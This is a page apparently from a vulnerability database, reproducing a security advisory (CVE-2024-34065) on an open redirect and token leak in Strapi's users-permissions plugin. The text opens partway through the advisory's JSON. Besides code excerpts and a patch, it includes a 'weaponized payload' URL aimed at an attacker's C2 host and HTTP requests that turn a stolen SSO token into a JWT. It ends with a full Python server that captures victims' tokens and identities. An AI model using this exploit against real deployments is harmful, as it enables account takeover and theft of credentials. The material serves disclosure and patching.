getService(\u0027jwt\u0027).issue({ id: user.id }),\n        user: await sanitizeUser(user, ctx),\n      });\n    } catch (error) {\n      throw new ApplicationError(error.message);\n    }\n  },\n\n  //...\n\n  async connect(ctx, next) {\n    const grant = require(\u0027grant-koa\u0027);\n\n    const providers = await strapi\n      .store({ type: \u0027plugin\u0027, name: \u0027users-permissions\u0027, key: \u0027grant\u0027 })\n      .get();\n\n    const apiPrefix = strapi.config.get(\u0027api.rest.prefix\u0027);\n    const grantConfig = {\n      defaults: {\n        prefix: `${apiPrefix}/connect`,\n      },\n      ...providers,\n    };\n\n    const [requestPath] = ctx.request.url.split(\u0027?\u0027);\n    const provider = requestPath.split(\u0027/connect/\u0027)[1].split(\u0027/\u0027)[0];\n\n    if (!_.get(grantConfig[provider], \u0027enabled\u0027)) {\n      throw new ApplicationError(\u0027This provider is disabled\u0027);\n    }\n\n    if (!strapi.config.server.url.startsWith(\u0027http\u0027)) {\n      strapi.log.warn(\n        \u0027You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url\u0027\n      );\n    }\n\n    // Ability to pass OAuth callback dynamically\n    grantConfig[provider].callback =\n      _.get(ctx, \u0027query.callback\u0027) ||\n      _.get(ctx, \u0027session.grant.dynamic.callback\u0027) ||\n      grantConfig[provider].callback;\n    grantConfig[provider].redirect_uri = getService(\u0027providers\u0027).buildRedirectUri(provider);\n\n    return grant(grantConfig)(ctx, next);\n  },\n\n  //...\n\n};\n```\n\nAnd more specifically:\n\n```js\n...\n\n    // Ability to pass OAuth callback dynamically\n    grantConfig[provider].callback =\n      _.get(ctx, \u0027query.callback\u0027) ||\n      _.get(ctx, \u0027session.grant.dynamic.callback\u0027) ||\n      grantConfig[provider].callback;\n    grantConfig[provider].redirect_uri = getService(\u0027providers\u0027).buildRedirectUri(provider);\n\n    return grant(grantConfig)(ctx, next);\n...\n```\n\nPossible patch:\n\n```js\ngrantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback\n```\n\n`_.get(ctx, \u0027query.callback\u0027)` = `$_GET[\"callback\"]` and `_.get(ctx, \u0027session\u0027)` = `$_COOKIE[\"koa.sess\"]` (which is `{\"grant\":{\"provider\":\"microsoft\",\"dynamic\":{\"callback\":\"https://XXXXXXX/\"}},\"_expire\":1701275652123,\"_maxAge\":86400000}`) so `_.get(ctx, \u0027session.grant.dynamic.callback\u0027)` = `https://XXXXXXX/`.\n\nThe route is clearly defined here:\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/routes/content-api/auth.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/routes/content-api/auth.js)\n\n```js\n\u0027use strict\u0027;\n\nmodule.exports = [\n\n//...\n\n  {\n    method: \u0027GET\u0027,\n    path: \u0027/auth/:provider/callback\u0027,\n    handler: \u0027auth.callback\u0027,\n    config: {\n      prefix: \u0027\u0027,\n    },\n  },\n\n  //...\n\n];\n```\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/services/providers-registry.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/services/providers-registry.js)\n\n```js\n\nconst getInitialProviders = ({ purest }) =\u003e ({\n\n//..\n\n  async microsoft({ accessToken }) {\n    const microsoft = purest({ provider: \u0027microsoft\u0027 });\n\n    return microsoft\n      .get(\u0027me\u0027)\n      .auth(accessToken)\n      .request()\n      .then(({ body }) =\u003e ({\n        username: body.userPrincipalName,\n        email: body.userPrincipalName,\n      }));\n  },\n\n//..\n\n});\n```\n\nIf parameter `$_GET[\"callback\"]` is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie `koa.sess`:\n\n`koa.sess`=`eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9`\n\nWhich once base64 decoded become `{\"grant\":{\"provider\":\"microsoft\",\"dynamic\":{\"callback\":\"https://\u003cTARGET\u003e/users/auth/redirect\"}},\"_expire\":1701275652123,\"_maxAge\":86400000}`.\n\nThe signature of the cookie is stored in cookie `koa.sess.sig`:\n\n`koa.sess.sig`=`wTRmcVRrn88hWMdg84VvSD87-_0`\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/bootstrap/grant-config.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/bootstrap/grant-config.js)\n\n```js\n\n//..\n\n  microsoft: {\n    enabled: false,\n    icon: \u0027windows\u0027,\n    key: \u0027\u0027,\n    secret: \u0027\u0027,\n    callback: `${baseURL}/microsoft/callback`,\n    scope: [\u0027user.read\u0027],\n  },\n\n//..\n```\n\n#### Vulnerability 2: Session token in URL\n\n##### Description\n\nApplications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.\n\n###### Example 1: SSO token transmitted within URL (`$_GET[\"access_token\"]`)\n\n- Path: \u003cspan dir=\"\"\u003e/api/connect/microsoft\u003c/span\u003e\n- Parameter: `$_GET[\"callback\"]`\n\nWhen a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.\n\nWeaponized payload:\n\n```plaintext\nhttps://\u003cTARGET\u003e/api/connect/microsoft?callback=http://\u003cC2\u003e:8080/\n```\n\nWith a web server specially developed to exploit the vulnerability listening on \u003cspan dir=\"\"\u003e\\\u003cC2\\\u003e:8080\u003c/span\u003e,  it is possible to retrieve a JWT token allowing authentication on Strapi.\n\nA user is on his browser when he decides to click on a link sent to him by e-mail.\n\n![c4](https://github.com/strapi/strapi/assets/30262080/c6e22fa1-14a4-4c76-a832-d07305f265b6)\n\n\u003e The attacker places the malicious link in the URL bar to simulate a victim\u0027s click.\n\n![c5](https://github.com/strapi/strapi/assets/30262080/4da28c5b-6501-4f93-9041-9917a2b070e6)\n\nThe server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user\u0027s SSO token.\n\n\u003e Everything is invisible to the victim.\n\n![c6](https://github.com/strapi/strapi/assets/30262080/58db0a31-3b3b-4648-958b-953eba88bf87)\n\nBecause the victim didn\u0027t change to another Web page.\n\n![c7](https://github.com/strapi/strapi/assets/30262080/ab4dd6f9-02e1-42c9-9142-434db865f0d3)\n\nThe attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.\n\n![c8](https://github.com/strapi/strapi/assets/30262080/aab8d22f-5f0e-4a67-85a8-2e333df9b84b)\n\n##### Details\n\n###### Get the JWT token with the `access_token`\n\nFirst of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.\n\nRequest (HTTP):\n\n```http\nGET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV\u003cREDACTED\u003eyBzA HTTP/1.1\nHost: \u003cTARGET\u003e\n\n```\n\nResponse (HTTP):\n\n```http\nHTTP/1.1 200 OK\nServer: nginx\nDate: Mon, 27 Nov 2023 17:58:46 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 411\nConnection: keep-alive\nContent-Security-Policy: connect-src \u0027self\u0027 https:;img-src \u0027self\u0027 data: blob: https://market-assets.strapi.io;media-src \u0027self\u0027 data: blob:;default-src \u0027self\u0027;base-uri \u0027self\u0027;font-src \u0027self\u0027 https: data:;form-action \u0027self\u0027;frame-ancestors \u0027self\u0027;object-src \u0027none\u0027;script-src \u0027self\u0027;script-src-attr \u0027none\u0027;style-src \u0027self\u0027 https: \u0027unsafe-inline\u0027\nReferrer-Policy: no-referrer\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Content-Type-Options: nosniff\nX-DNS-Prefetch-Control: off\nX-Download-Options: noopen\nX-Frame-Options: SAMEORIGIN\nX-Permitted-Cross-Domain-Policies: none\nVary: Origin\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Powered-By: \u003cREDACTED\u003e\n\n{\"jwt\":\"eyJhbG\u003cREDACTED\u003eeCac\",\"user\":{\"id\":111,\"username\":\"\u003cREDACTED\u003e@\u003cREDACTED\u003e-ext.com\",\"email\":\"\u003credacted\u003e@\u003credacted\u003e-ext.com\",\"provider\":\"microsoft\",\"confirmed\":true,\"blocked\":false,\"createdAt\":\"2023-11-14T12:35:42.440Z\",\"updatedAt\":\"2023-11-16T21:00:19.241Z\",\"is_external\":false}}\n```\n\n###### Request API routes using the JWT token\n\nThen reuse the JWT token to request the API.\n\nRequest (HTTP):\n\n```http\nGET /api/users/me/groups?app=support HTTP/1.1\nHost: \u003cTARGET\u003e\nAuthorization: Bearer eyJ\u003cREDACTED\u003eEeCac\n\n```\n\nResponse (HTTP):\n\n```http\nHTTP/1.1 200 OK\nServer: nginx\nDate: Tue, 28 Nov 2023 13:45:42 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 24684\nConnection: keep-alive\nContent-Security-Policy: connect-src \u0027self\u0027 https:;img-src \u0027self\u0027 data: blob: https://market-assets.strapi.io;media-src \u0027self\u0027 data: blob:;default-src \u0027self\u0027;base-uri \u0027self\u0027;font-src \u0027self\u0027 https: data:;form-action \u0027self\u0027;frame-ancestors \u0027self\u0027;object-src \u0027none\u0027;script-src \u0027self\u0027;script-src-attr \u0027none\u0027;style-src \u0027self\u0027 https: \u0027unsafe-inline\u0027\nReferrer-Policy: no-referrer\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Content-Type-Options: nosniff\nX-DNS-Prefetch-Control: off\nX-Download-Options: noopen\nX-Frame-Options: SAMEORIGIN\nX-Permitted-Cross-Domain-Policies: none\nVary: Origin\nX-RateLimit-Limit: 10\nX-RateLimit-Remaining: 9\nX-RateLimit-Reset: 1701179203\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nX-Powered-By: \u003cREDACTED\u003e\n\n{\"apps\":{\"support\":{\"groups\":[{\"device_whitelist\":null,\"name\":\"test - support\",\"id\":10,\"group_privileges\":[{\"id\":37,\u003cREDACTED\u003e\n\n...\n```\n\n### POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)\n\n```python\nimport base64\nimport json\nimport urllib.parse\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom sys import argv\n\n\n# Strapi URL.\nTARGET = \"target.com\"\n\n# URLs to which victims are automatically redirected.\nREDIRECT_URL = [\n    \"strapi.io\",\n    \"www.google.fr\"\n]\n# URL used to generate a valid JWT token for authentication within the\n# application.\nGEN_JWT_URL = f\"https://{TARGET}/api/auth/microsoft/callback\"\n\n\n# This function is used to generate a curl command which once executed, will\n# give us a valid JWT connection token.\ndef generate_curl_command(token):\n    command = f\"curl \u0027{GEN_JWT_URL}?access_token={token}\u0027\"\n    return command\n\n\n# We create a custom HTTP server to retrieve users\u0027 SSO tokens.\nclass CustomServer(BaseHTTPRequestHandler):\n\n    # Here we override the default logging function to reduce verbosity.\n    def log_message(self, format, *args):\n        pass\n\n    # This function automatically redirects a user to the page defined in the\n    # global variable linked to the redirection.\n    def _set_response(self):\n        self.send_response(302)\n        self.send_header(\"Location\", REDIRECT_URL[0])\n        self.end_headers()\n\n    # If an SSO token is present, we parse it and log the result in STDOUT.\n    def do_GET(self):\n        # This condition checks whether a token is present in the URL.\n        if str(self.path).find(\"access_token\") != -1:\n            # If this is the case, we recover the token.\n            query = urllib.parse.urlparse(self.path).query\n            query_components = dict(qc.split(\"=\") for qc in query.split(\"\u0026\"))\n            access_token = urllib.parse.unquote(query_components[\"access_token\"])\n\n            # In the token, which is a string in JWT format, we retrieve the\n            # body part of the token.\n            interesting_data = access_token.split(\".\")[1]\n\n            # Patching base64 encoded data.\n            interesting_data = interesting_data + \"=\" * (-len(interesting_data) % 4)\n\n            # Parsing JSON.\n            json_data = json.loads(base64.b64decode(interesting_data.encode()))\n            family_name, given_name, ipaddr, upn = json_data[\"given_name\"], json_data[\"family_name\"], json_data[\"ipaddr\"], json_data[\"upn\"]\n\n            print(f\"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\\n{access_token}\\n\")\n            print(f\"[*] Run: \\\"{generate_curl_command(query_components[\u0027access_token\u0027])}\\\" to get JWT token\")\n\n        self._set_response()\n        self.wfile.write(\"Redirecting ...\".encode(\"utf-8\"))\n\n\ndef run(server_class=HTTPServer, handler_class=CustomServer, ip=\"0.0.0.0\", port=8080):\n    server_address = (ip, port)\n    httpd = server_class(server_address, handler_class)\n\n    print(f\"Starting httpd ({ip}:{port}) ...\")\n    try:\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        pass\n\n    httpd.server_close()\n    print(\"Stopping httpd ...\")\n\n\nif __name__ == \"__main__\":\n    if len(argv) == 3:\n        run(ip=argv[1], port=int(argv[2]))\n    else:\n        run()\n```\n",
  "id": "GHSA-wrvh-rcmr-9qfc",
  "modified": "2024-06-12T19:39:11Z",
  "published": "2024-06-12T19:39:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34065"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/commit/9c79921d22142a5de77ea26151550a14e4b12669"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/strapi/strapi"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2024-34065

Vulnerability from cvelistv5

ghsa-wrvh-rcmr-9qfc

Vulnerability from github

Summary

Impact

Technical details

Vulnerability 1: Open Redirect

Description

Remediation

Example 1: Open Redirect in /api/connect/microsoft via $_GET["callback"]

Vulnerability 2: Session token in URL

Description

Example 1: SSO token transmitted within URL ($_GET["access_token"])

Details

Get the JWT token with the access_token

Request API routes using the JWT token

POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

Strapi URL.

URLs to which victims are automatically redirected.

URL used to generate a valid JWT token for authentication within the

application.

This function is used to generate a curl command which once executed, will

give us a valid JWT connection token.

We create a custom HTTP server to retrieve users' SSO tokens.

Tags

Sightings

Nomenclature

Example 1: Open Redirect in /api/connect/microsoft via `$_GET["callback"]`

Example 1: SSO token transmitted within URL (`$_GET["access_token"]`)

Get the JWT token with the `access_token`